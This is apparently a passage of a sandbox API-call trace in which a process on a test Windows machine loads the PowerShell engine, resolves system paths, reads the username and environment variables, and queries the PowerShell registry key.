	[0345.967] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ace50 | out: lpFileInformation=0x1ace50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0345.967] SetErrorMode (uMode=0x1) returned 0x1
	[0345.967] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1acc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.967] SetErrorMode (uMode=0x1) returned 0x1
	[0345.967] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ace50 | out: lpFileInformation=0x1ace50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0345.967] SetErrorMode (uMode=0x1) returned 0x1
	[0345.967] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1acc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1acb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.968] SetErrorMode (uMode=0x1) returned 0x1
	[0345.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ace50 | out: lpFileInformation=0x1ace50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0345.968] SetErrorMode (uMode=0x1) returned 0x1
	[0345.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.968] SetErrorMode (uMode=0x1) returned 0x1
	[0345.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ace50 | out: lpFileInformation=0x1ace50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0345.968] SetErrorMode (uMode=0x1) returned 0x1
	[0345.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1acb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.969] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.969] SetErrorMode (uMode=0x1) returned 0x1
	[0345.969] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ace90 | out: lpFileInformation=0x1ace90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0345.969] SetErrorMode (uMode=0x1) returned 0x1
	[0345.969] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.969] SetErrorMode (uMode=0x1) returned 0x1
	[0345.969] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ace90 | out: lpFileInformation=0x1ace90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0345.969] SetErrorMode (uMode=0x1) returned 0x1
	[0345.969] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1acc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1acb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0345.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.970] SetErrorMode (uMode=0x1) returned 0x1
	[0345.970] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ace90 | out: lpFileInformation=0x1ace90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0345.970] SetErrorMode (uMode=0x1) returned 0x1
	[0345.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.970] SetErrorMode (uMode=0x1) returned 0x1
	[0345.970] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ace90 | out: lpFileInformation=0x1ace90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0345.970] SetErrorMode (uMode=0x1) returned 0x1
	[0345.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1acb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0345.973] SetErrorMode (uMode=0x1) returned 0x1
	[0345.973] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad150 | out: lpFileInformation=0x1ad150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0345.973] SetErrorMode (uMode=0x1) returned 0x1
	[0345.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.301] CoTaskMemAlloc (cb=0x804) returned 0x1b829950
	[0346.301] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b829950, nSize=0x1ad4b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad4b8) returned 0x1
	[0346.301] CoTaskMemFree (pv=0x1b829950) 
	[0346.301] CoTaskMemAlloc (cb=0x204) returned 0x414cc0
	[0346.301] GetUserNameW (in: lpBuffer=0x414cc0, pcbBuffer=0x1ad4f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad4f8) returned 1
	[0346.301] CoTaskMemFree (pv=0x414cc0) 
	[0346.302] ReportEventW (hEventLog=0x1b9d0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3313d20*="Available", lpRawData=0x3313ab0) returned 1
	[0346.591] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.591] CoTaskMemFree (pv=0x467e50) 
	[0346.592] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.592] CoTaskMemFree (pv=0x467e50) 
	[0346.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.594] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.594] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0346.594] CoTaskMemFree (pv=0x467e50) 
	[0346.594] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.594] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0346.594] CoTaskMemFree (pv=0x467e50) 
	[0346.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.596] GetCurrentProcessId () returned 0x5a4
	[0346.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.599] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x384) returned 0x0
	[0346.599] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad45c, lpData=0x0, lpcbData=0x1ad458*=0x0 | out: lpType=0x1ad45c*=0x1, lpData=0x0, lpcbData=0x1ad458*=0x56) returned 0x0
	[0346.599] CoTaskMemAlloc (cb=0x5a) returned 0x4791f0
	[0346.599] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad42c, lpData=0x4791f0, lpcbData=0x1ad428*=0x56 | out: lpType=0x1ad42c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad428*=0x56) returned 0x0
	[0346.599] CoTaskMemFree (pv=0x4791f0) 
	[0346.600] RegCloseKey (hKey=0x384) returned 0x0
	[0346.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.601] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.601] CoTaskMemFree (pv=0x467e50) 
